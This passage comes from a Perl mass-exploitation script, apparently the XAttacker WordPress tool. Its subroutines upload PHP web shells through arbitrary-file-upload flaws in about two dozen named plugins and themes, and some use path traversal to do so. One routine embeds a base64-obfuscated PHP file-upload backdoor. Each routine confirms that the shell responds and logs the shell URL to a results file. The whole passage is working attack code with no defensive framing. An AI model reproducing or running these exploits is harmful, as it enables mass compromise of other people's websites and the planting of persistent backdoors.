  900.            
  901.             );
  902.  
  903. $comadsmanagerup="$site/wp-content/themes/konzept/includes/uploadify/uploads/XAttacker.php?X=Attacker";
  904.  
  905. $checkcomadsmanagerup = $ua->get("$comadsmanagerup")->content;
  906. if($checkcomadsmanagerup =~/X Attacker/) {
  907. print color('bold red'),"[";
  908. print color('bold green'),"+";
  909. print color('bold red'),"] ";
  910. print color('bold white'),"konzept themess";
  911. print color('bold white')," ................... ";
  912. print color('bold green'),"VULN\n";
  913. print color('bold green')," [";
  914. print color('bold red'),"+";
  915. print color('bold green'),"] ";
  916. print color('bold white'),"File Uploaded Successfully\n";
  917. print color('bold white'),"  [Link] => $comadsmanagerup\n";
  918. open (TEXT, '>>Result/index.txt');
  919. print TEXT "$comadsmanagerup\n";
  920. close (TEXT);
  921. }else{
  922. print color('bold red'),"[";
  923. print color('bold green'),"+";
  924. print color('bold red'),"] ";
  925. print color('bold white'),"konzept themess";
  926. print color('bold white')," ................... ";
  927. print color('bold red'),"Failed\n";
  928. }
  929. }
  930. sub seoww(){
  931. my $url = "$site/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name=test.php";
  932.  
  933. my $index='<?php
  934. eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));
  935. ?>';
  936. my $body = $ua->post( $url,
  937.         Content_Type => 'multipart/form-data',
  938.         Content => $index
  939.         );
  940.  
  941. $zoomerup="$site/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/test.php";
  942.  
  943. my $checkk = $ua->get("$zoomerup")->content;
  944. if($checkk =~/izocin/) {
  945. print color('bold red'),"[";
  946. print color('bold green'),"+";
  947. print color('bold red'),"] ";
  948. print color('bold white'),"wp Seowatcher";
  949. print color('bold white')," ..................... ";
  950. print color('bold green'),"VULN";
  951. print color('bold white'),"\n";
  952. print color('bold green')," [";
  953. print color('bold red'),"+";
  954. print color('bold green'),"] ";
  955. print color('bold white'),"Shell Uploaded Successfully\n";
  956. print color('bold white'),"  [Link] => $zoomerup\n";
  957. open (TEXT, '>>Result/Shells.txt');
  958. print TEXT "$zoomerup\n";
  959. close (TEXT);
  960. }else{
  961. print color('bold red'),"[";
  962. print color('bold green'),"+";
  963. print color('bold red'),"] ";
  964. print color('bold white'),"wp Seowatcher";
  965. print color('bold white')," ..................... ";
  966. print color('bold red'),"Failed";
  967. print color('bold white'),"\n";
  968. }
  969. }
  970. ################ comadsmanager #####################
  971. sub comzcc(){
  972. my $url = "$site/wp-content/plugins/omni-secure-files/plupload/examples/upload.php";
  973.  
  974. my $response = $ua->post( $url,
  975.             Cookie => "", Content_Type => "form-data", Content => [file => ["tool/BackDoor.jpg"], name => "XAttacker.php"]
  976.            
  977.             );
  978.  
  979. $comadsmanagerup="$site/wp-content/plugins/omni-secure-files/plupload/examples/uploads/XAttacker.php?X=Attacker";
  980.  
  981. $checkcomadsmanagerup = $ua->get("$comadsmanagerup")->content;
  982. if($checkcomadsmanagerup =~/X Attacker/) {
  983. print color('bold red'),"[";
  984. print color('bold green'),"+";
  985. print color('bold red'),"] ";
  986. print color('bold white'),"omni-secure-fil";
  987. print color('bold white')," ................... ";
  988. print color('bold green'),"VULN\n";
  989. print color('bold green')," [";
  990. print color('bold red'),"+";
  991. print color('bold green'),"] ";
  992. print color('bold white'),"File Uploaded Successfully\n";
  993. print color('bold white'),"  [Link] => $comadsmanagerup\n";
  994. open (TEXT, '>>Result/index.txt');
  995. print TEXT "$comadsmanagerup\n";
  996. close (TEXT);
  997. }else{
  998. print color('bold red'),"[";
  999. print color('bold green'),"+";
  1000. print color('bold red'),"] ";
  1001. print color('bold white'),"omni-secure-fil";
  1002. print color('bold white')," ................... ";
  1003. print color('bold red'),"Failed\n";
  1004. }
  1005. }
  1006. ################ pitchprint #####################
  1007. sub pith(){
  1008.  
  1009. my $addblockurl = "$site/wp-content/plugins/pitchprint/uploader/";
  1010. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => ['files[]' => ["tool/XAttacker.php"],]);
  1011. $addblockup="$site/wp-content/plugins/pitchprint/uploader/files/XAttacker.php?X=Attacker";
  1012. my $checkaddblock = $ua->get("$addblockup")->content;
  1013.  
  1014. if($checkaddblock =~/X Attacker/) {
  1015. print color('bold red'),"[";
  1016. print color('bold green'),"+";
  1017. print color('bold red'),"] ";
  1018. print color('bold white'),"pitchprint";
  1019. print color('bold white')," ........................ ";
  1020. print color('bold white'),"";
  1021. print color('bold green'),"VULN";
  1022. print color('bold white'),"\n";
  1023. print color('bold green')," [";
  1024. print color('bold red'),"+";
  1025. print color('bold green'),"] ";
  1026. print color('bold white'),"Shell Uploaded Successfully\n";
  1027. print color('bold white'),"  [Link] => $addblockup\n";
  1028. open (TEXT, '>>Result/Shells.txt');
  1029. print TEXT "$addblockup\n";
  1030. close (TEXT);
  1031. }else{
  1032. print color('bold red'),"[";
  1033. print color('bold green'),"+";
  1034. print color('bold red'),"] ";
  1035. print color('bold white'),"pitchprint";
  1036. print color('bold white')," ........................ ";
  1037. print color('bold red'),"Failed";
  1038. print color('bold white'),"\n";}
  1039. }
  1040. ################ pitchprint #####################
  1041. sub satos(){
  1042.  
  1043. my $addblockurl = "$site/wp-content/themes/satoshi/upload-file.php";
  1044. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [uploadfile => ["tool/XAttacker.php"],]);
  1045. $addblockup="$site/wp-content/satoshi/images/XAttacker.php?X=Attacker";
  1046. my $checkaddblock = $ua->get("$addblockup")->content;
  1047.  
  1048. if($checkaddblock =~/X Attacker/) {
  1049. print color('bold red'),"[";
  1050. print color('bold green'),"+";
  1051. print color('bold red'),"] ";
  1052. print color('bold white'),"satoshi";
  1053. print color('bold white')," ........................... ";
  1054. print color('bold white'),"";
  1055. print color('bold green'),"VULN";
  1056. print color('bold white'),"\n";
  1057. print color('bold green')," [";
  1058. print color('bold red'),"+";
  1059. print color('bold green'),"] ";
  1060. print color('bold white'),"Shell Uploaded Successfully\n";
  1061. print color('bold white'),"  [Link] => $addblockup\n";
  1062. open (TEXT, '>>Result/Shells.txt');
  1063. print TEXT "$addblockup\n";
  1064. close (TEXT);
  1065. }else{
  1066. print color('bold red'),"[";
  1067. print color('bold green'),"+";
  1068. print color('bold red'),"] ";
  1069. print color('bold white'),"satoshi";
  1070. print color('bold white')," ........................... ";
  1071. print color('bold red'),"Failed";
  1072. print color('bold white'),"\n";}
  1073. }
  1074. ################ pinboart #####################
  1075. sub pinb(){
  1076.  
  1077. my $addblockurl = "$site/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1";
  1078. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"],]);
  1079. $addblockup="$site/wp-content/themes/pinboard/uploads/XAttacker.php?X=Attacker";
  1080. my $checkaddblock = $ua->get("$addblockup")->content;
  1081.  
  1082. if($checkaddblock =~/X Attacker/) {
  1083. print color('bold red'),"[";
  1084. print color('bold green'),"+";
  1085. print color('bold red'),"] ";
  1086. print color('bold white'),"pinboard";
  1087. print color('bold white')," .......................... ";
  1088. print color('bold white'),"";
  1089. print color('bold green'),"VULN";
  1090. print color('bold white'),"\n";
  1091. print color('bold green')," [";
  1092. print color('bold red'),"+";
  1093. print color('bold green'),"] ";
  1094. print color('bold white'),"Shell Uploaded Successfully\n";
  1095. print color('bold white'),"  [Link] => $addblockup\n";
  1096. open (TEXT, '>>Result/Shells.txt');
  1097. print TEXT "$addblockup\n";
  1098. close (TEXT);
  1099. }else{
  1100. print color('bold red'),"[";
  1101. print color('bold green'),"+";
  1102. print color('bold red'),"] ";
  1103. print color('bold white'),"pinboard";
  1104. print color('bold white')," .......................... ";
  1105. print color('bold red'),"Failed";
  1106. print color('bold white'),"\n";}
  1107. }################ pinboart #####################
  1108. sub barc(){
  1109.  
  1110. my $addblockurl = "$site/wp-content/plugins/barclaycart/uploadify/uploadify.php";
  1111. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"],]);
  1112. $addblockup="$site/wp-content/plugins/barclaycart/uploadify/XAttacker.php?X=Attacker";
  1113. my $checkaddblock = $ua->get("$addblockup")->content;
  1114.  
  1115. if($checkaddblock =~/X Attacker/) {
  1116. print color('bold red'),"[";
  1117. print color('bold green'),"+";
  1118. print color('bold red'),"] ";
  1119. print color('bold white'),"barclaycart";
  1120. print color('bold white')," ....................... ";
  1121. print color('bold white'),"";
  1122. print color('bold green'),"VULN";
  1123. print color('bold white'),"\n";
  1124. print color('bold green')," [";
  1125. print color('bold red'),"+";
  1126. print color('bold green'),"] ";
  1127. print color('bold white'),"Shell Uploaded Successfully\n";
  1128. print color('bold white'),"  [Link] => $addblockup\n";
  1129. open (TEXT, '>>Result/Shells.txt');
  1130. print TEXT "$addblockup\n";
  1131. close (TEXT);
  1132. }else{
  1133. print color('bold red'),"[";
  1134. print color('bold green'),"+";
  1135. print color('bold red'),"] ";
  1136. print color('bold white'),"barclaycart";
  1137. print color('bold white')," ....................... ";
  1138. print color('bold red'),"Failed";
  1139. print color('bold white'),"\n";}
  1140. }
  1141. sub bard(){
  1142.  
  1143. my $addblockurl = "$site/wp-content/plugins/wpstorecart/php/upload.php";
  1144. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"],]);
  1145. $addblockup="$site/wp-content/uploads/wpstorecart/XAttacker.php?X=Attacker";
  1146. my $checkaddblock = $ua->get("$addblockup")->content;
  1147.  
  1148. if($checkaddblock =~/X Attacker/) {
  1149. print color('bold red'),"[";
  1150. print color('bold green'),"+";
  1151. print color('bold red'),"] ";
  1152. print color('bold white'),"wpstorecart";
  1153. print color('bold white')," ....................... ";
  1154. print color('bold white'),"";
  1155. print color('bold green'),"VULN";
  1156. print color('bold white'),"\n";
  1157. print color('bold green')," [";
  1158. print color('bold red'),"+";
  1159. print color('bold green'),"] ";
  1160. print color('bold white'),"Shell Uploaded Successfully\n";
  1161. print color('bold white'),"  [Link] => $addblockup\n";
  1162. open (TEXT, '>>Result/Shells.txt');
  1163. print TEXT "$addblockup\n";
  1164. close (TEXT);
  1165. }else{
  1166. print color('bold red'),"[";
  1167. print color('bold green'),"+";
  1168. print color('bold red'),"] ";
  1169. print color('bold white'),"wpstorecart";
  1170. print color('bold white')," ....................... ";
  1171. print color('bold red'),"Failed";
  1172. print color('bold white'),"\n";}
  1173. }
  1174. sub asrd(){
  1175.  
  1176. my $addblockurl = "$site/wp-content/plugins/asset-manager/upload.php";
  1177. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"],]);
  1178. $addblockup="$site/wp-content/uploads/assets/temp/XAttacker.php?X=Attacker";
  1179. my $checkaddblock = $ua->get("$addblockup")->content;
  1180.  
  1181. if($checkaddblock =~/X Attacker/) {
  1182. print color('bold red'),"[";
  1183. print color('bold green'),"+";
  1184. print color('bold red'),"] ";
  1185. print color('bold white'),"asset-manager";
  1186. print color('bold white')," ..................... ";
  1187. print color('bold white'),"";
  1188. print color('bold green'),"VULN";
  1189. print color('bold white'),"\n";
  1190. print color('bold green')," [";
  1191. print color('bold red'),"+";
  1192. print color('bold green'),"] ";
  1193. print color('bold white'),"Shell Uploaded Successfully\n";
  1194. print color('bold white'),"  [Link] => $addblockup\n";
  1195. open (TEXT, '>>Result/Shells.txt');
  1196. print TEXT "$addblockup\n";
  1197. close (TEXT);
  1198. }else{
  1199. print color('bold red'),"[";
  1200. print color('bold green'),"+";
  1201. print color('bold red'),"] ";
  1202. print color('bold white'),"asset-manager";
  1203. print color('bold white')," ..................... ";
  1204. print color('bold red'),"Failed";
  1205. print color('bold white'),"\n";}
  1206. }
  1207. ################ evolvet #####################
  1208. sub evol(){
  1209.  
  1210. my $addblockurl = "$site/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php";
  1211. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [qqfile => ["tool/XAttacker.php"],]);
  1212. $addblockup="$site/wp-content/uploads/$year/$month/XAttacker.php?X=Attacker";
  1213. my $checkaddblock = $ua->get("$addblockup")->content;
  1214.  
  1215. if($checkaddblock =~/X Attacker/) {
  1216. print color('bold red'),"[";
  1217. print color('bold green'),"+";
  1218. print color('bold red'),"] ";
  1219. print color('bold white'),"evolve";
  1220. print color('bold white')," ............................ ";
  1221. print color('bold white'),"";
  1222. print color('bold green'),"VULN";
  1223. print color('bold white'),"\n";
  1224. print color('bold green')," [";
  1225. print color('bold red'),"+";
  1226. print color('bold green'),"] ";
  1227. print color('bold white'),"Shell Uploaded Successfully\n";
  1228. print color('bold white'),"  [Link] => $addblockup\n";
  1229. open (TEXT, '>>Result/Shells.txt');
  1230. print TEXT "$addblockup\n";
  1231. close (TEXT);
  1232. }else{
  1233. print color('bold red'),"[";
  1234. print color('bold green'),"+";
  1235. print color('bold red'),"] ";
  1236. print color('bold white'),"evolve";
  1237. print color('bold white')," ............................ ";
  1238. print color('bold red'),"Failed";
  1239. print color('bold white'),"\n";}
  1240. }
  1241. ################ acf-front #####################
  1242. sub acft(){
  1243.  
  1244. my $addblockurl = "$site/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php";
  1245. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [files => ["tool/XAttacker.php"],]);
  1246. $addblockup="$site//wp-content/uploads/uigen_'.$year.'/'XAttacker.php?X=Attacker";
  1247. my $checkaddblock = $ua->get("$addblockup")->content;
  1248.  
  1249. if($checkaddblock =~/X Attacker/) {
  1250. print color('bold red'),"[";
  1251. print color('bold green'),"+";
  1252. print color('bold red'),"] ";
  1253. print color('bold white'),"acf-frontend";
  1254. print color('bold white')," ...................... ";
  1255. print color('bold white'),"";
  1256. print color('bold green'),"VULN";
  1257. print color('bold white'),"\n";
  1258. print color('bold green')," [";
  1259. print color('bold red'),"+";
  1260. print color('bold green'),"] ";
  1261. print color('bold white'),"Shell Uploaded Successfully\n";
  1262. print color('bold white'),"  [Link] => $addblockup\n";
  1263. open (TEXT, '>>Result/Shells.txt');
  1264. print TEXT "$addblockup\n";
  1265. close (TEXT);
  1266. }else{
  1267. print color('bold red'),"[";
  1268. print color('bold green'),"+";
  1269. print color('bold red'),"] ";
  1270. print color('bold white'),"acf-frontend";
  1271. print color('bold white')," ...................... ";
  1272. print color('bold red'),"Failed";
  1273. print color('bold white'),"\n";}
  1274. }
  1275. ################ woocommerce RCE #####################
  1276. sub desg(){
  1277.  
  1278. my $izo = $site;
  1279. if($izo =~ /http:\/\/(.*)\//){ $izo = $1; }
  1280. elsif($izo =~ /http:\/\/(.*)/){ $izo = $1; }
  1281. elsif($izo =~ /https:\/\/(.*)\//){ $izo = $1; }
  1282. elsif($izo =~ /https:\/\/(.*)/){ $izo = $1; }
  1283.  
  1284. my $addr = inet_ntoa((gethostbyname($izo))[4]);
  1285. my $digest = md5_hex($addr);
  1286. my $dir = encode_base64('../../../../');
  1287. my $file = "tool/XAttacker.php";
  1288.  
  1289. my $fuck = $ua->post("$site/wp-content/themes/designfolio-plus/admin/upload-file.php",Content_Type => 'form-data',Content => [ $digest => [$file] ,upload_path => $dir ]);
  1290.  
  1291.  
  1292. $dmup="$site/XAttacker.php?X=Attacker";
  1293. my $checkdm = $ua->get("$dmup")->content;
  1294. if($checkdm =~/X Attacker/) {
  1295. print color('bold red'),"[";
  1296. print color('bold green'),"+";
  1297. print color('bold red'),"] ";
  1298. print color('bold white'),"designfolio-plus";
  1299. print color('bold white')," .................. ";
  1300. print color('bold white'),"";
  1301. print color('bold green'),"VULN";
  1302. print color('bold white'),"\n";
  1303. print color('bold green')," [";
  1304. print color('bold red'),"+";
  1305. print color('bold green'),"] ";
  1306. print color('bold white'),"Shell Uploaded Successfully\n";
  1307. print color('bold white'),"  [Link] => $dmup\n";
  1308. open (TEXT, '>>Result/Shells.txt');
  1309. print TEXT "$dmup\n";
  1310. close (TEXT);
  1311. }else{
  1312. print color('bold red'),"[";
  1313. print color('bold green'),"+";
  1314. print color('bold red'),"] ";
  1315. print color('bold white'),"designfolio-plus";
  1316. print color('bold white')," .................. ";
  1317. print color('bold red'),"Failed";
  1318. print color('bold white'),"\n";}
  1319. }
  1320. ################ learndash #####################
  1321. sub learndash(){
  1322. my $url = "$site/";
  1323. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1324. $ua->timeout(20);
  1325. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1326.  
  1327. my $url = "$site/";
  1328. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "post" => "foobar","course_id" => "foobar","uploadfile" => "foobar",'uploadfiles[]' => ["tool/dayi.php.php"] ]);
  1329.  
  1330. my $check = $ua->get("$site/wp-content/uploads/assignments/dayi.php.")->content;
  1331. $dmup="$site/wp-content/uploads/assignments/ms-sitemple.php";
  1332. my $checkdm = $ua->get("$dmup")->content;
  1333. if($checkdm =~/SangPujaan/) {
  1334. print color('bold red'),"[";
  1335. print color('bold green'),"+";
  1336. print color('bold red'),"] ";
  1337. print color('bold white'),"Learndash";
  1338. print color('bold white')," ......................... ";
  1339. print color('bold white'),"";
  1340. print color('bold green'),"VULN";
  1341. print color('bold white'),"\n";
  1342. print color('bold green')," [";
  1343. print color('bold red'),"+";
  1344. print color('bold green'),"] ";
  1345. print color('bold white'),"Shell Uploaded Successfully\n";
  1346. print color('bold white'),"  [Link] => $dmup\n";
  1347. open (TEXT, '>>Result/Shells.txt');
  1348. print TEXT "$dmup\n";
  1349. close (TEXT);
  1350. }else{
  1351. print color('bold red'),"[";
  1352. print color('bold green'),"+";
  1353. print color('bold red'),"] ";
  1354. print color('bold white'),"Learndash";
  1355. print color('bold white')," ......................... ";
  1356. print color('bold red'),"Failed";
  1357. print color('bold white'),"\n";
  1358. }
  1359. }
  1360. ################ learndash #####################
  1361. sub learndashx(){
  1362. my $url = "$site/";
  1363. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1364. $ua->timeout(20);
  1365. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1366.  
  1367. my $url = "$site/";
  1368. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "post" => "foobar","course_id" => "foobar","uploadfile" => "foobar",'uploadfiles[]' => ["tool/dayicin.php.php"] ]);
  1369.  
  1370. $dmup="$site/wp-content/uploads/assignments/dayicin.php.?X=Attacker";
  1371. my $checkdm = $ua->get("$dmup")->content;
  1372. if($checkdm =~/X Attacker/) {
  1373. print color('bold red'),"[";
  1374. print color('bold green'),"+";
  1375. print color('bold red'),"] ";
  1376. print color('bold white'),"Learndash2";
  1377. print color('bold white')," ........................ ";
  1378. print color('bold white'),"";
  1379. print color('bold green'),"VULN";
  1380. print color('bold white'),"\n";
  1381. print color('bold green')," [";
  1382. print color('bold red'),"+";
  1383. print color('bold green'),"] ";
  1384. print color('bold white'),"Shell Uploaded Successfully\n";
  1385. print color('bold white'),"  [Link] => $dmup\n";
  1386. open (TEXT, '>>Result/Shells.txt');
  1387. print TEXT "$dmup\n";
  1388. close (TEXT);
  1389. }else{
  1390. print color('bold red'),"[";
  1391. print color('bold green'),"+";
  1392. print color('bold red'),"] ";
  1393. print color('bold white'),"Learndash2";
  1394. print color('bold white')," ........................ ";
  1395. print color('bold red'),"Failed";
  1396. print color('bold white'),"\n";
  1397. }
  1398. }
  1399. ################ learndash #####################
  1400. sub learndash2(){
  1401. my $url = "$site/";
  1402. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  1403. $ua->timeout(20);
  1404. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  1405.  
  1406. my $url = "$site/";
  1407. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "post" => "foobar","course_id" => "foobar","uploadfile" => "foobar",'uploadfiles[]' => ["tool/XAttacker.php.docx"] ]);
  1408.  
  1409.  
  1410. $dmup="$site/wp-content/uploads/assignments/XAttacker.php.docx?X=Attacker";
  1411. my $checkdm = $ua->get("$dmup")->content;
  1412. if($checkdm =~/X Attacker/) {
  1413. print color('bold red'),"[";
  1414. print color('bold green'),"+";
  1415. print color('bold red'),"] ";
  1416. print color('bold white'),"Learndash Docx";
  1417. print color('bold white')," .................... ";
  1418. print color('bold white'),"";
  1419. print color('bold green'),"VULN";
  1420. print color('bold white'),"\n";
  1421. print color('bold green')," [";
  1422. print color('bold red'),"+";
  1423. print color('bold green'),"] ";
  1424. print color('bold white'),"Shell Uploaded Successfully\n";
  1425. print color('bold white'),"  [Link] => $dmup\n";
  1426. open (TEXT, '>>Result/Shells.txt');
  1427. print TEXT "$dmup\n";
  1428. close (TEXT);
  1429. }else{
  1430. print color('bold red'),"[";
  1431. print color('bold green'),"+";
  1432. print color('bold red'),"] ";
  1433. print color('bold white'),"Learndash Docx";
  1434. print color('bold white')," .................... ";
  1435. print color('bold red'),"Failed";
  1436. print color('bold white'),"\n";
  1437. }
  1438. }
  1439.  
  1440. ################ woocommerce-files #####################
  1441. sub wof(){
  1442. my $url = "$site/wp-admin/admin-ajax.php";
  1443.  
  1444. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "action" => "nm_personalizedproduct_upload_file","action" => "upload.php",'file' => ["tool/XAttacker.phtml"] ]);
  1445.  
  1446. $zoomerup="$site/wp-content/uploads/product_files/XAttacker.phtml?X=Attacker";
  1447. my $checkdm = $ua->get("$zoomerup")->content;
  1448. if($checkdm =~/X Attacker/) {
  1449. print color('bold red'),"[";
  1450. print color('bold green'),"+";
  1451. print color('bold red'),"] ";
  1452. print color('bold white'),"Wo product_files";
  1453. print color('bold white')," .................. ";
  1454. print color('bold green'),"VULN";
  1455. print color('bold white'),"\n";
  1456. print color('bold green')," [";
  1457. print color('bold red'),"+";
  1458. print color('bold green'),"] ";
  1459. print color('bold white'),"Shell Uploaded Successfully\n";
  1460. print color('bold white'),"  [Link] => $zoomerup\n";
  1461. open (TEXT, '>>Result/Shells.txt');
  1462. print TEXT "$zoomerup\n";
  1463. close (TEXT);
  1464. }else{
  1465. print color('bold red'),"[";
  1466. print color('bold green'),"+";
  1467. print color('bold red'),"] ";
  1468. print color('bold white'),"Wo product_files";
  1469. print color('bold white')," .................. ";
  1470. print color('bold red'),"Failed";
  1471. print color('bold white'),"\n";
  1472. }
  1473. }
  1474.  
  1475. ################ woocommerce-post-files #####################
  1476. sub wof1(){
  1477. my $url = "$site/wp-admin/admin-ajax.php";
  1478.  
  1479. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => [ "value" => "nm_postfront_upload_file","value" => "upload.php",'file' => ["tool/XAttacker.phtml"] ]);
  1480.  
  1481. $zoomerup="$site/wp-content/uploads/post_files/XAttacker.phtml?X=Attacker";
  1482. my $checkdm = $ua->get("$zoomerup")->content;
  1483. if($checkdm =~/X Attacker/) {
  1484. print color('bold red'),"[";
  1485. print color('bold green'),"+";
  1486. print color('bold red'),"] ";
  1487. print color('bold white'),"Wo Post Fields";
  1488. print color('bold white')," .................... ";
  1489. print color('bold green'),"VULN";
  1490. print color('bold white'),"\n";
  1491. print color('bold green')," [";
  1492. print color('bold red'),"+";
  1493. print color('bold green'),"] ";
  1494. print color('bold white'),"Shell Uploaded Successfully\n";
  1495. print color('bold white'),"  [Link] => $zoomerup\n";
  1496. open (TEXT, '>>Result/Shells.txt');
  1497. print TEXT "$zoomerup\n";
  1498. close (TEXT);
  1499. }else{
  1500. print color('bold red'),"[";
  1501. print color('bold green'),"+";
  1502. print color('bold red'),"] ";
  1503. print color('bold white'),"Wo Post Fields";
  1504. print color('bold white')," .................... ";
  1505. print color('bold red'),"Failed";
  1506. print color('bold white'),"\n";
  1507. }
  1508. }
  1509. ################ Viral Options #####################
  1510. sub virald(){
  1511.  
  1512. my $addblockurl = "$site/wp-admin/admin-post.php?task=wpmp_upload_previews";
  1513. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"]]);
  1514. $addblockup="$site/wp-content/uploads/wpmp-previews//XAttacker.php?X=Attacker";
  1515. my $checkaddblock = $ua->get("$addblockup")->content;
  1516.  
  1517. if($checkaddblock =~/X Attacker/) {
  1518. print color('bold red'),"[";
  1519. print color('bold green'),"+";
  1520. print color('bold red'),"] ";
  1521. print color('bold white'),"Market Place";
  1522. print color('bold white')," .................. ";
  1523. print color('bold white'),"";
  1524. print color('bold green'),"VULN";
  1525. print color('bold white'),"\n";
  1526. print color('bold green')," [";
  1527. print color('bold red'),"+";
  1528. print color('bold green'),"] ";
  1529. print color('bold white'),"Shell Uploaded Successfully\n";
  1530. print color('bold white'),"  [Link] => $addblockup\n";
  1531. open (TEXT, '>>Result/Shells.txt');
  1532. print TEXT "$addblockup\n";
  1533. close (TEXT);
  1534. }else{
  1535. print color('bold red'),"[";
  1536. print color('bold green'),"+";
  1537. print color('bold red'),"] ";
  1538. print color('bold white'),"Market Place";
  1539. print color('bold white')," ...................... ";
  1540. print color('bold red'),"Failed";
  1541. print color('bold white'),"\n";}
  1542. }
  1543. ################ Viral Options #####################
  1544. sub viraldz(){
  1545.  
  1546. my $addblockurl = "$site/wp-content/plugins/uploader/uploadify/uploadify.php";
  1547. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => ['folder'=>"/wp-content/uploads", Filedata => ["tool/XAttacker.php"]]);
  1548. $addblockup="$site/wp-content/uploads/XAttacker.php?X=Attacker";
  1549. my $checkaddblock = $ua->get("$addblockup")->content;
  1550.  
  1551. if($checkaddblock =~/X Attacker/) {
  1552. print color('bold red'),"[";
  1553. print color('bold green'),"+";
  1554. print color('bold red'),"] ";
  1555. print color('bold white'),"uploader Plugin";
  1556. print color('bold white')," ............... ";
  1557. print color('bold white'),"";
  1558. print color('bold green'),"VULN";
  1559. print color('bold white'),"\n";
  1560. print color('bold green')," [";
  1561. print color('bold red'),"+";
  1562. print color('bold green'),"] ";
  1563. print color('bold white'),"Shell Uploaded Successfully\n";
  1564. print color('bold white'),"  [Link] => $addblockup\n";
  1565. open (TEXT, '>>Result/Shells.txt');
  1566. print TEXT "$addblockup\n";
  1567. close (TEXT);
  1568. }else{
  1569. print color('bold red'),"[";
  1570. print color('bold green'),"+";
  1571. print color('bold red'),"] ";
  1572. print color('bold white'),"uploader Plugin";
  1573. print color('bold white')," ................... ";
  1574. print color('bold red'),"Failed";
  1575. print color('bold white'),"\n";}
  1576. }
  1577. ################ Viral Options #####################
  1578. sub viraldzy(){
  1579.  
  1580. my $addblockurl = "$site/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php";
  1581. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => [Filedata => ["tool/XAttacker.php"]]);
  1582. $addblockup="$site/wp-content/plugins/wp-property/third-party/uploadify/XAttacker.php?X=Attacker";
  1583. my $checkaddblock = $ua->get("$addblockup")->content;
  1584.  
  1585. if($checkaddblock =~/X Attacker/) {
  1586. print color('bold red'),"[";
  1587. print color('bold green'),"+";
  1588. print color('bold red'),"] ";
  1589. print color('bold white'),"wp-property";
  1590. print color('bold white')," ................... ";
  1591. print color('bold white'),"";
  1592. print color('bold green'),"VULN";
  1593. print color('bold white'),"\n";
  1594. print color('bold green')," [";
  1595. print color('bold red'),"+";
  1596. print color('bold green'),"] ";
  1597. print color('bold white'),"Shell Uploaded Successfully\n";
  1598. print color('bold white'),"  [Link] => $addblockup\n";
  1599. open (TEXT, '>>Result/Shells.txt');
  1600. print TEXT "$addblockup\n";
  1601. close (TEXT);
  1602. }else{
  1603. print color('bold red'),"[";
  1604. print color('bold green'),"+";
  1605. print color('bold red'),"] ";
  1606. print color('bold white'),"wp-property";
  1607. print color('bold white')," ....................... ";
  1608. print color('bold red'),"Failed";
  1609. print color('bold white'),"\n";}
  1610. }
  1611. ################ Viral Options #####################
  1612. sub viraldzyx(){
  1613.  
  1614. my $addblockurl = "$site/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php";
  1615. my $response = $ua->post($addblockurl, Content_Type => 'multipart/form-data', Content => ['config_path'=>'../../../../../../', image => ["tool/XAttacker.php"]]);
  1616. $addblockup="$site/wp-content/plugins/social-networking-e-commerce-1/images/uploads/XAttacker.php?X=Attacker";
  1617. my $checkaddblock = $ua->get("$addblockup")->content;
  1618.  
  1619. if($checkaddblock =~/X Attacker/) {
  1620. print color('bold red'),"[";
  1621. print color('bold green'),"+";
  1622. print color('bold red'),"] ";
  1623. print color('bold white'),"social-network";
  1624. print color('bold white')," ................ ";
  1625. print color('bold white'),"";
  1626. print color('bold green'),"VULN";
  1627. print color('bold white'),"\n";
  1628. print color('bold green')," [";
  1629. print color('bold red'),"+";
